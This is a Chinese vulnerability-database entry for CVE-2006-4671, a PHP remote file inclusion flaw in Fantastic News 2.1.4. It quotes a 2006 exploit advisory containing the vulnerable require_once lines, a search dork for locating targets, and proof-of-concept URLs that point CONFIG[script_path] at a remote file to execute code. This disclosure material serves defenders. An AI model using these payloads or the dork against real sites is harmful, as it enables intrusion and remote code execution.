Fantastic News 'headlines.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111885 漏洞类型 代码注入
发布时间 2006-12-27 更新时间 2007-01-10
CVE编号 CVE-2006-4671 CNNVD-ID CNNVD-200609-152
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-152
|漏洞详情
FantasticNews2.1.4及可能的更早版本的headlines.php中存在PHP远程文件包含漏洞,远程攻击者可以通过CONFIG[script_path]参数中的URL执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ Fantastic News <== 2.1.4 (CONFIG[script_path]) Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............:  http://fscripts.com
+ Affected Software .: Fantastic News <== 2.1.4
+ Download ..........: http://fscripts.com/download.php?file=1
+ Dork ..............: Powered by Fantastic News v2.1.4
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: Mr-m07 <xp10[at]hotmail.com> Yee7 Team >- WwW.Yee7.com -<
+-------------------------------------------------------------------------------------------
+ Vulnerable Code:
+ =>>archive.php
+
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s)  16,17,18,19
+  =>>          require_once($CONFIG['script_path']."config.php");
+  =>>          require_once($CONFIG['script_path']."functions/functions.php");
+  =>>          require_once($CONFIG['script_path']."functions/mysql.php");
+  =>>          require_once($CONFIG['script_path']."functions/template.php");
+
+
+ Proof Of Concept:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?
+
+
+
+
+-------------------------------------------------------------------------------------------
+Thanx To:
+ Yee7 Team http://www.yee7.com
+ Alshikh
+ ShockShadow
+ Mr.HaCkEr
+ StarseviL
+ AssassiN
+ Star Reach
+
+
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-27]
|参考资料

来源:XF
名称:fantasticnews-configscriptpath-file-include(31121)
链接:http://xforce.iss.net/xforce/xfdb/31121
来源:BID
名称:21796
链接:http://www.securityfocus.com/bid/21796
来源:MILW0RM
名称:3027
链接:http://www.milw0rm.com/exploits/3027
来源:VUPEN
名称:ADV-2006-3513
链接:http://www.frsirt.com/english/advisories/2006/3513
来源:SECUNIA
名称:23519
链接:http://secunia.com/advisories/23519
来源:SECUNIA
名称:21807
链接:http://secunia.com/advisories/21807
来源:MILW0RM
名称:3027
链接:http://milw0rm.com/exploits/3027